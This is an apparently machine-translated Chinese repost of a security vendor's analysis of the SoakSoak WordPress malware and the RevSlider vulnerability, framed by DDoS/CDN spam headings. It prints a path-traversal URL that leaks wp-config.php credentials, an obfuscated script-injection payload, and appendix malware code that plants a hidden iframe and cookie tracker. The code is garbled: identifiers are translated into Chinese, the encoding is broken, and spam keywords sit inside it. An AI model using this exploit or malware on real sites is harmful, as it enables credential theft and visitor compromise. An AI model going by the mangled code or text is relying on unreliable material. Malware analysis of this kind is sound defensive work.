来自 网络 2021-07-17 01:02 的文章

cdn高防_ddos防御方法_超高防御

cdn高防_ddos防御方法_超高防御

据Sucuri报道,截至本文撰写之日,soakakasue WordPress恶意软件已经影响了超过100000个WordPress网站,并导致超过11000个域名被谷歌列入黑名单。这篇文章提供了对恶意软件行为的深入分析,建议的行动,并更新了Sentrix网站安全解决方案的用户。你脆弱吗?通过检查对以下URL的访问,您可以轻松测试您的网站是否易受攻击(将您的域替换为您的网站域):?action=revslider_show_image&img=../wp-配置.php易受攻击的站点将返回包含敏感信息(如数据库用户名和密码)的配置文件:/**MySQL数据库用户名*/define('DB_USER',XXXX);/**MySQL数据库密码*/define('DB_password','XXXX');攻击者可以使用这些信息直接访问数据库、窃取敏感数据、破坏数据和破坏网站。浸泡和RevSlider漏洞据Sucuri称,soakakakue WordPress恶意软件可能与WordPress slider插件RevSlider中的漏洞有关。使用RevSlider插件的网站会被非合法用户上传文件。攻击者将能够执行以下URL并上载恶意文件:然后将上载以下脚本:eval(decodeuri组件('%28%66%66%75%6E%63%74%69%69%6F%6F%6E%28%28%29%29%20%20%7B%20%76%61%68%68%65%65%61%61%64%64%3D%64%64%6F%63%75%75%6D%65%65%6E%74%74%45%45%6C%65%6D%65%65%65%65%67%74%42%42%79%54%61%61%67%67%4E%61%61%61%67%67%46%61%68%28%28%28%27%68%65%65%65%61%61%67%27%27%27%27%29%29%29%65%%20%76%61%72%20%73%63%72%69%70%74%3D%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%3B%20%73%63%63%72%69%70%74%74%2E 74%74%79%70%65%65%3D%27%74%65%78%78%74%74%2F%66%61%76%61%61%73%63%63%72%72%72%72%74%74%2E%73%72%72%63%63%63%3D%27%68%74%74%74%74%74%74%70%70%70%70%3A%2F%2F%73%6%6%6%6%6%6%6%6%69%6%69%69%69%70%74%74%78%78%76%76%61%73%70%74%74%74%74%74%74%74%74%74%2F%63%6F%64%65%27%3B%20%73%63%72%69%70%74%2E%69%64%3D%27%78%78%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%20%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%20%7D%28%29%29%3B');解码有效载荷时,将得到以下结果:(function(){var head=document.getElementsByTagName('head')[0];var脚本=文档.createElement("脚本");脚本.类型='文本/javascript';脚本.src=’’; 脚本.id="xxyzz_petushok";头。附属物(脚本);}());实际上,脚本将在页面的标题中添加脚本的上下文。上面的代码引用了一个添加到头中的脚本,该脚本在附录中进行了描述。攻击者现在已获得访问权限,允许修改WordPress中Google Ads的行为,方法是插入一个脚本,该脚本使用Ads机制收集cookies并将数据发送给攻击者,如下所示:‘?collect[]=1&rule[]=m1&www[]=db';我们将其归类为一种极为严重的攻击,因为它不仅对数据中心造成影响,而且对最终用户也有影响。与数据中心相比,对于最终用户来说,管理风险和风险要困难得多。如何避免攻击这些程序有助于避免浸泡攻击:跟随WordPress.org网站建议验证所有输入并清理所有输入阻止对WP admin和WP内容的访问不允许文件遍历使用插件时要小心不要使用未知插件不要公开插件管理接口检查插件代码是否存在安全问题回顾并遵循WordPress强化指南:客户状态Sentrix客户不受RevSlider漏洞或Soakakakue WordPress恶意软件的影响。Sentrix核心引擎只公开合法用户应该访问的url。管理接口未公开。例如:如果没有Sentrix,以下URL可能会面临信息泄漏:?action=revslider_show_image&img=../wp-配置.php但是,对于Sentrix,这个URL不会被公开,因为它不是一个合法用户可以访问的。这使得潜在的漏洞变得毫无用处。请将您使用Soakastake WordPress恶意软件的经验告诉我,并随时通过LinkedIn或nimrod@sentrix.com 附录:代码片段函数BDN(cap){var uas=window.navigator.userAgent,OperaB=/Opera[\/]+\w+\.\w+/i,OperaV=/Version[\/]+\w+\.\w+/i,FirefoxB=/Firefox\/\w+.\w+/i,ChromeB=/Chrome\/\w+.\w+/i,cdn网络加速,阿里云有没有免费的ddos防御,IEB=/MSIE*\d+.\w+/i,BRW=new Array(),ddos防御软件,BRWSplit=/[\/\.]/i,操作=无人机匹配(OperaV),火狐=无人机匹配(FirefoxB),铬=无人机匹配(铬EB),即=无人机匹配(IEB),棋牌游戏高防cdn,歌剧=无人机匹配(OperaB);如果((!歌剧=="")和(!OperaV=="")BRW[0]=OperaV[0]。替换(/Version/,"Opera")else if(!Opera=="")BRW[0]=Opera[0]否则如果(!IE=="")BRW[0]=IE[0]否则如果(!Firefox=="")BRW[0]=Firefox[0]否则(!Chrome=="")BRW[0]=Chrome[0];var outstr;if(BRW[0]!=null)outstr=BRW[0]。拆分(BRWSplit);if((cap==null)&&(未完成!=空){长度[2];outstr[2]=outstr[2],子串(0,cap);outstr[3]='取消';如果(无人机索引("Windows")!=-1)outstr[3]="窗口";退货(未付);}else返回(false);}函数SVB(){var dtstr=BDN();如果(dtstr[0]){if((dtstr[0]=='MSIE'| | dtstr[0]=='Firefox')&dtstr[3]=='Windows'){变量divTag=文档.createElement('div');            divTag.id=‘咕’;            document.body.appendChild(divTag);变量googlecode=文档.createElement('iframe');            谷歌代码.src= ‘?collect[]=1&rule[]=m1&www[]=db';            googlecode.width="5倍";            googlecode.height='6px';            谷歌代码.setAttribute("风格","v"可见性:隐藏’);            文档.getElementById('goo').appendChild(googlecode);        }    }}函数SCk(cnm,cValue,nDay,path){var today=新日期();var exp=新日期();如果(nDay==null | | nDay==0)nDay=7;    预期设定时间(今天。getTime()+3600000*24*nDay);    文档.cookie=cnm+"="+转义(cValue)+;"exps="+exp.toGMTString公司()+((路径)?";路径="+路径:");}函数GCk(nm){变量启动=document.cookie.indexOf文件(纳米+"=");可变长度=开始+nm.长度+1个;如果((!开始(&)nm!= document.cookie.substring(0,nm.长度))) {返回空值;    }if(start==-1)返回null;变量结束=document.cookie.indexOf文件(";",len);如果(结束==-1)结束=文档.cookie.length;返回unescape(document.cookie.substring(长度,结束处);}如果(CookieNavigator启用) {如果(GCk('MGHTRX')==12112014){}否则{SCk('MGHTRX','12112014','7',ddos攻击防御做的最好的,'/');如果(文档。已加载) {SVB();}其他{如果(addEventListener窗口) {                addEventListener窗口("加载",SVB,错误);}其他{                窗口附件("加载",SVB);            }        }    }}